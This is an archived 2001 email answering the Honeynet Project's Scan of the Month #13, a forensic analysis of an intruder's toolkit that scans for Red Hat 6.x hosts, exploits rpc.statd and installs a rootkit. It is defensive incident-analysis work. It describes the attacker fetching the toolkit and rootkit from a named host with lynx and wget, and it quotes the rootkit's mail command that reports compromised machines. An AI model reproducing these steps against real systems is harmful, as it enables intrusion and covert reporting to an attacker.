From marc@suse.de Sat Mar 17 20:02:38 2001 Date: Sun, 11 Mar 2001 16:15:48 +0100 (CET) From: Marc Heuse To: project@honeynet.org Subject: Scan of the month Answers for SCAN OF THE MONTH #13: March, 2001 by Marc Heuse , http://www.suse.de/~marc Q1: What is the blackhat attempting to do with his command line syntax? A1: He changes into the "hidden" directory /usr/sbin/.mail, downloads a the file www.becys.org/LUCKROOT.TAR with lynx, unpacks it (well, having some difficulties with command line options and spelling) and then starts the front end script of his downloaded tookit serveral times. The different calls of the tool are different network scans (B class scans, well see below) Q2: What does the tool accomplish? A2: It scans networks for Linux systems (espec. Redhat 6.x) with vulnerable rpc.statd daemons running, exploits them and installs a rootkit. Q3: How does the tool work? A3:The difficullty even was actually raised as the .TAR file was zipped. This 31337 protection was used to prevent the use by script kiddies. :-) The TAR file consists of three tools, a bourne shell script and two binaries and their representative source code. The shell script is a front-end for the first of the binaries, "luckscan-a"; it compiles the two tools if they aren't yet. "luckscan-a" (compiled on a glibc2 linux) is a class A scanner which checks for an open port. (Via additional arguments, it can also be used as a class B and C scanner). Is a port found open, it runs "luckstatdx" "luckstatdx" (same compilation data) is a rpc.statd exploit, written for/against Redhat 6.0 to 6.2. ("luckscan-a" only runs it in the mode against Redhat 6.2 with nfs-utils-0.1.6-2, however the offsets etc. are all the same in the other modes). If the shellcode succeeds commands are sent to the target to show some system output and then download the file http://www.becys.org/xzibit.tar.gz with wget and install this rootkit. Q4: Is this tool a worm, or would you classify it as something else? A4: As it does not distribute, it's not a worm. I'd call it an exploit scanner with trojanize function. However with some simple changes, it could be made into a worm. Q5: Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? A5: The principle is not original, it's lived in the blackhat community for a decade now. Based on previous tools, uhh ... hmm the luckscan-a scanner could be copied or written by themselves. I opt for the last one as the coding style in the function where the statd exploit is called is not different then in the rest of the code. Same for the front-end "luckgo". But be sure that they reuse it a lot ... The statd exploit was written by someone else, where the blackhat seemed to remove the original author information and only kept his. The change in the statd exploit is now that some system information is printed (uname, id, and then the rootkit is downloaded and installed. BonusQ: What information can you obtain about who is using or created the tool? BonusA: The statd exploit reads: "statdx modify by becys " and downloads the rootkit from www.becys.org, in luckgo: "scaner-h4x0r by becys" + "BeCyS & ReSpEkT", in luckscan-a you can find also the "h4x0r" string. So we can conclude that the guy writing (and using) that toolkit is becys and his friend respekt. (The rootkit also sends an email [mail -s "becys rewting" becys@becys.org] btw.) Extra-Bonus-Info: Redhats advisory states: "Although there is no known exploit for the flaw in rpc.statd Red Hat urges all users running rpc.statd to upgrade to upgrade to the new nfs-utils package." harharhar... please keep up with this stuff, as it is really fun :-) But please make the tests harder... Greets, Marc -- Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg E@mail: marc@suse.de Function: Security Research and Advisory PGP: "lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka" Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C Private: http://www.suse.de/~marc SuSE: http://www.suse.de/security